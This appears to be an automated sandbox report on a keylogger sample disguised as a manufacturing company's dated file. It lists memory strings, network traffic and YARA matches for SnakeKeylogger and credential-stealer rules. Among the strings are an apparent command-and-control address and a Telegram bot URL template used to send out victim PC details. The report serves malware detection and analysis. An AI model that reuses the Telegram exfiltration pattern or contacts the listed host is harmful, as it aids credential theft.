Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1280413561.00000000024A9000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 0000000C.00000002.1319580024.000000000328E000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20a
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000033AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000033A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002ECF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enp
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E23000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003284000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003284000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003284000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E23000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000033DF000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000333C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000033DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB
Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002F00000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/p

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49746 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 11.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34f8490.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Autofill Manufacturing Sdn Bhd 28-08-2024.exe.34b5a70.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Autofill Manufacturing Sdn Bhd 28-08-2024.exe PID: 7968, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 0_2_00B0E314	0_2_00B0E314
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 0_2_0671F730	0_2_0671F730
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 0_2_06719620	0_2_06719620
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 0_2_0671A458	0_2_0671A458
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 0_2_06717F78	0_2_06717F78
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 0_2_06717F68	0_2_06717F68
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 0_2_06719F48	0_2_06719F48
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 0_2_06717B40	0_2_06717B40
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_010AC146	11_2_010AC146
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_010A5362	11_2_010A5362
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_010AD278	11_2_010AD278
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_010AC468	11_2_010AC468
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_010AC738	11_2_010AC738
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_010AE988	11_2_010AE988
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_010A69A0	11_2_010A69A0
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_010ACA08	11_2_010ACA08
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_010A9DE0	11_2_010A9DE0
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_010ACCD8	11_2_010ACCD8
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_010ACFA9	11_2_010ACFA9
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_010A6FC8	11_2_010A6FC8
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_010A3E09	11_2_010A3E09
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_010AF961	11_2_010AF961
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_010AE97B	11_2_010AE97B
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_010A39EE	11_2_010A39EE
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_010A29EC	11_2_010A29EC
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_010A3AA1	11_2_010A3AA1
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_06921E80	11_2_06921E80
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_0692DE00	11_2_0692DE00
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_069217A0	11_2_069217A0
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_06929C18	11_2_06929C18
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_0692FC68	11_2_0692FC68
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_06920B30	11_2_06920B30
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_06929328	11_2_06929328
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_06925028	11_2_06925028
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_06922968	11_2_06922968
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_0692E6B0	11_2_0692E6B0
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_0692E6A0	11_2_0692E6A0
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_06921E70	11_2_06921E70
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_0692178F	11_2_0692178F
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_0692EF51	11_2_0692EF51
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_0692EF60	11_2_0692EF60
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_0692CCA0	11_2_0692CCA0
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_0692DDF1	11_2_0692DDF1
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_0692DDFF	11_2_0692DDFF
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_0692D550	11_2_0692D550
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_0692D540	11_2_0692D540
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_06929548	11_2_06929548
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_0692EAF8	11_2_0692EAF8
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_0692E258	11_2_0692E258
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_0692E24A	11_2_0692E24A
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_06928B91	11_2_06928B91
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_0692F3B8	11_2_0692F3B8
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_06928BA0	11_2_06928BA0
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_0692EB08	11_2_0692EB08
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_06920B20	11_2_06920B20
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_0692D0F8	11_2_0692D0F8
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_0692D0E9	11_2_0692D0E9
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_0692F810	11_2_0692F810
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_06925018	11_2_06925018
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_0692F802	11_2_0692F802
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_06920006	11_2_06920006
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_06920040	11_2_06920040
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_0692D999	11_2_0692D999
Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe	Code function: 11_2_0692D9A8	11_2_0692D9A8
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 12_2_0306E314	12_2_0306E314
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 12_2_0764E9D0	12_2_0764E9D0
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 12_2_07649620	12_2_07649620
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 12_2_0764A458	12_2_0764A458
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 12_2_07647F68	12_2_07647F68
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 12_2_07647F78	12_2_07647F78
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 12_2_07649F48	12_2_07649F48
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 12_2_07647B40	12_2_07647B40
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_056BC5C0	20_2_056BC5C0
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_056BD599	20_2_056BD599
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_056B77A0	20_2_056B77A0
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_056B5370	20_2_056B5370
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_056BD2C8	20_2_056BD2C8
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_056BCD28	20_2_056BCD28
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_056BEC18	20_2_056BEC18
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_056B7F18	20_2_056B7F18
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_056BCFF7	20_2_056BCFF7
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_056B5968	20_2_056B5968
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_056BAA78	20_2_056BAA78
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_056BCA58	20_2_056BCA58
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_056BC788	20_2_056BC788
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_056BFC48	20_2_056BFC48
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_056BEC0B	20_2_056BEC0B
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_056B3E09	20_2_056B3E09
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_056B29EC	20_2_056B29EC
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_056BF804	20_2_056BF804
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_056B3AA1	20_2_056B3AA1
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_07030B30	20_2_07030B30
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_07031BA8	20_2_07031BA8
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_070397B0	20_2_070397B0
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_07032288	20_2_07032288
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_07035290	20_2_07035290
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_07039ED8	20_2_07039ED8
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_07032970	20_2_07032970
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_0703CF08	20_2_0703CF08
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_07030B20	20_2_07030B20
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_0703D360	20_2_0703D360
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_07031B97	20_2_07031B97
Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe	Code function: 20_2_0703D7B8	20_2_0703D7B8
